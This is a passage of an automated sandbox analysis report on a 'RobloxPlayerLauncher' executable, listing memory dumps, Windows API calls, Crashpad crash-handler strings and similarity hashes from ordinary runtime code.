              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: FormatFreeLocalMessage
              • String ID: A connection with the server could not be established$An error occurred in the secure channel support$Success$The operation timed out$The server name or address could not be resolved$Unknown error 0x%8.8x
              • API String ID: 1427518018-2351849574
              • Opcode ID: f3079a4e46bf1091fff146ae0d5e429107735f496e2fdd1d87362b0fa09d33e4
              • Instruction ID: 81eb04d0865766fe52c4c46b934a3d757f98dc340b837d5accb3d8edbf53920b
              • Opcode Fuzzy Hash: f3079a4e46bf1091fff146ae0d5e429107735f496e2fdd1d87362b0fa09d33e4
              • Instruction Fuzzy Hash: 4761237AB00119ABEB25DF1CEC45BBDB765FB84714F04456AFD09A7382D779680087E0
              APIs
              • RegCloseKey.ADVAPI32(00000000), ref: 00768039
              • GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 0076811C
              • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 00768131
              • RegCloseKey.ADVAPI32(00000000), ref: 00768189
              • RegCloseKey.ADVAPI32(00000000), ref: 0076823B
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: Close$AddressHandleModuleProc
              • String ID: Advapi32.dll$RegOpenKeyTransactedW$version
              • API String ID: 1193707174-3018907180
              • Opcode ID: 129cbea0bc6008044a79be5e19e12a3810ca3e2ae2e1361d28e4eb9abeb7fcdf
              • Instruction ID: c010a5b868cd50c7dbb35d07d5f4b7b16d626be2ac2da7b49eee40c667613e92
              • Opcode Fuzzy Hash: 129cbea0bc6008044a79be5e19e12a3810ca3e2ae2e1361d28e4eb9abeb7fcdf
              • Instruction Fuzzy Hash: 1B81B074A00249AFEF24CF58DC18BAEB7F5FB45304F04461DEC02A7291EBB99944CB62
              APIs
              • std::locale::_Init.LIBCPMT ref: 0072BCA5
                • Part of subcall function 009E230C: __EH_prolog3.LIBCMT ref: 009E2313
                • Part of subcall function 009E230C: std::_Lockit::_Lockit.LIBCPMT ref: 009E231E
                • Part of subcall function 009E230C: std::locale::_Setgloballocale.LIBCPMT ref: 009E2339
                • Part of subcall function 009E230C: std::_Lockit::~_Lockit.LIBCPMT ref: 009E238F
              • std::ios_base::failure::failure.LIBCPMT ref: 0072BD7D
              • OpenEventW.KERNEL32(00000002,00000000,?,ios_base::failbit set), ref: 0072BE2D
              • SetEvent.KERNEL32(00000000), ref: 0072BE3E
              • CloseHandle.KERNEL32(00000000), ref: 0072BE4E
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: EventLockitstd::_std::locale::_$CloseH_prolog3HandleInitLockit::_Lockit::~_OpenSetgloballocalestd::ios_base::failure::failure
              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
              • API String ID: 2664175911-1866435925
              • Opcode ID: 6f4e6281325624d7959ba6697ac421d194dd5377676c0ccd68da04a3066a30c8
              • Instruction ID: bae11666b4ed7e6eb72b146ceadb5c9a5674e4582d1d91022ff828b13640e665
              • Opcode Fuzzy Hash: 6f4e6281325624d7959ba6697ac421d194dd5377676c0ccd68da04a3066a30c8
              • Instruction Fuzzy Hash: 2F6165B5A00714DFDB20DF58E845BABBBF5FB84300F04461DE84697791DBBAA804CB91
              APIs
                • Part of subcall function 00A28D00: InitializeCriticalSectionAndSpinCount.KERNEL32(?,000007D0,?,008B074C,00000000,00000000,?), ref: 00A28D09
              • RegisterWaitForSingleObject.KERNEL32(?,?,?,?,000000FF,00000000), ref: 008B07C0
              • RegisterWaitForSingleObject.KERNEL32(0CCCCCCC,?,?,?,000000FF,00000000), ref: 008B0807
              • RegisterWaitForSingleObject.KERNEL32(FFFFFFFF,?,?,?,000000FF,00000008), ref: 008B0851
                • Part of subcall function 00A281C0: OutputDebugStringW.KERNEL32(00000000), ref: 00A28106
              Strings
              • RegisterWaitForSingleObject crash dump requested, xrefs: 008B07C6
              • RegisterWaitForSingleObject non-crash dump requested, xrefs: 008B080D
              • ../../../util/win/exception_handler_server.cc, xrefs: 008B07D2, 008B0819, 008B0863
              • RegisterWaitForSingleObject process end, xrefs: 008B0857
              • void __thiscall crashpad::internal::ClientData::RegisterThreadPoolWaits(void (__stdcall *)(void *,unsigned char),void (__stdcall *)(void *,unsigned char),void (__stdcall *)(void *,unsigned char)), xrefs: 008B07D7, 008B081E, 008B0868
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: ObjectRegisterSingleWait$CountCriticalDebugInitializeOutputSectionSpinString
              • String ID: ../../../util/win/exception_handler_server.cc$RegisterWaitForSingleObject crash dump requested$RegisterWaitForSingleObject non-crash dump requested$RegisterWaitForSingleObject process end$void __thiscall crashpad::internal::ClientData::RegisterThreadPoolWaits(void (__stdcall *)(void *,unsigned char),void (__stdcall *)(void *,unsigned char),void (__stdcall *)(void *,unsigned char))
              • API String ID: 4220453299-3490542302
              • Opcode ID: ea4651e5840127e34ad0c69fa3b0e6f7f25597a66107fc0fded3a2a4e909cb67
              • Instruction ID: dfedc09623c86e939ade7fd6c01f68e33ac243e1e7ffd84a6c92ef576d1257fb
              • Opcode Fuzzy Hash: ea4651e5840127e34ad0c69fa3b0e6f7f25597a66107fc0fded3a2a4e909cb67
              • Instruction Fuzzy Hash: B5514AB1604309ABDB60EF68DC42F8BBBE4BB05750F004628F859D76D1EB71EA44CB91
              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: CurrentThread$_xtime_get$Xtime_diff_to_millis2
              • String ID:
              • API String ID: 3943753294-0
              • Opcode ID: 4c621b4b1ac2c4bd85eca08a97820d41679f24dc81d463966a3aa952a5656657
              • Instruction ID: f001e908701903cdce9d3da62621ab90326a6b9902c5eac8d5fe730fdab82e57
              • Opcode Fuzzy Hash: 4c621b4b1ac2c4bd85eca08a97820d41679f24dc81d463966a3aa952a5656657
              • Instruction Fuzzy Hash: 6551B234900296DFCF12DF66C985AADB7F8FF48311B24855AE8069B251DB70EE81CF91
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID:
              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
              • API String ID: 0-1866435925
              • Opcode ID: 33c6081ac6c0315c2dabb27909fee7860a886e695fe7b4a3fe0857d1aa77434f
              • Instruction ID: 2927ea30c321570a6613b871f20560784076270fe8c94c9339524e05cecf0cfb
              • Opcode Fuzzy Hash: 33c6081ac6c0315c2dabb27909fee7860a886e695fe7b4a3fe0857d1aa77434f
              • Instruction Fuzzy Hash: 1C71BD75A00218DFEB24CF68D845BAAB7F5EB88314F144628F905E7292D738A901CB90
              APIs
                • Part of subcall function 00741C10: std::_Lockit::_Lockit.LIBCPMT ref: 00741C37
                • Part of subcall function 00741C10: std::_Lockit::_Lockit.LIBCPMT ref: 00741C55
                • Part of subcall function 00741C10: std::_Lockit::~_Lockit.LIBCPMT ref: 00741C75
                • Part of subcall function 00741C10: std::_Lockit::~_Lockit.LIBCPMT ref: 00741D44
              • std::ios_base::failure::failure.LIBCPMT ref: 008A874B
              Strings
              • could not read resource data entry from , xrefs: 008A88EC
              • ../../../snapshot/win/pe_image_resource_reader.cc, xrefs: 008A88F5
              • ios_base::badbit set, xrefs: 008A8722, 008A874A
              • ios_base::failbit set, xrefs: 008A872B
              • bool __thiscall crashpad::PEImageResourceReader::FindResourceByID(unsigned short,unsigned short,unsigned short,unsigned __int64 *,unsigned __int64 *,unsigned int *) const, xrefs: 008A88FA
              • ios_base::eofbit set, xrefs: 008A8730
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: Lockitstd::_$Lockit::_Lockit::~_$std::ios_base::failure::failure
              • String ID: ../../../snapshot/win/pe_image_resource_reader.cc$bool __thiscall crashpad::PEImageResourceReader::FindResourceByID(unsigned short,unsigned short,unsigned short,unsigned __int64 *,unsigned __int64 *,unsigned int *) const$could not read resource data entry from $ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
              • API String ID: 3570791469-2312888652
              • Opcode ID: 4cdeb0d089e156bad87c3ce800da318a87714d94c36c2c8d05341523a4b5f194
              • Instruction ID: 8d010675247b657a44a8944c8008c33fdbcb8fd2e2cc0d26a21fef4fd8fde550
              • Opcode Fuzzy Hash: 4cdeb0d089e156bad87c3ce800da318a87714d94c36c2c8d05341523a4b5f194
              • Instruction Fuzzy Hash: 0C414A75A00215DFDB14DBA8C989EA9B7F4FF49304F1980A9E905DB762DB34ED40CB90
              APIs
              • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00834CAB
              • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,?,00000104,00000000), ref: 00834D23
              • GetLastError.KERNEL32 ref: 00834D31
              • GetLastError.KERNEL32 ref: 00834DAA
              • GetLastError.KERNEL32 ref: 00834E7A
              • GetLastError.KERNEL32 ref: 00834FCB
              • CloseHandle.KERNEL32(00000000), ref: 0083505A
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: ErrorLast$Process$CloseFullHandleImageNameOpenQuery
              • String ID:
              • API String ID: 619744174-0
              • Opcode ID: db3c744fd584cd5252291b2467328c4e866cacf09cfe87d9a5ffe3e5af9b4753
              • Instruction ID: a197b7728d9571176faac705aab3fcfc5e2b2baeda94d60688c2dcf08eab1e26
              • Opcode Fuzzy Hash: db3c744fd584cd5252291b2467328c4e866cacf09cfe87d9a5ffe3e5af9b4753
              • Instruction Fuzzy Hash: B0C1AC71900208DFCF14DFA8D884BAEBBB1FF89314F184219E804EB291D775A946CBD1
              APIs
              • std::_Lockit::_Lockit.LIBCPMT ref: 00715C63
              • std::_Lockit::_Lockit.LIBCPMT ref: 00715C86
              • std::_Lockit::~_Lockit.LIBCPMT ref: 00715CA6
              • std::_Facet_Register.LIBCPMT ref: 00715D0B
              • std::_Lockit::~_Lockit.LIBCPMT ref: 00715D23
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
              • String ID: argument not found
              • API String ID: 459529453-3524968529
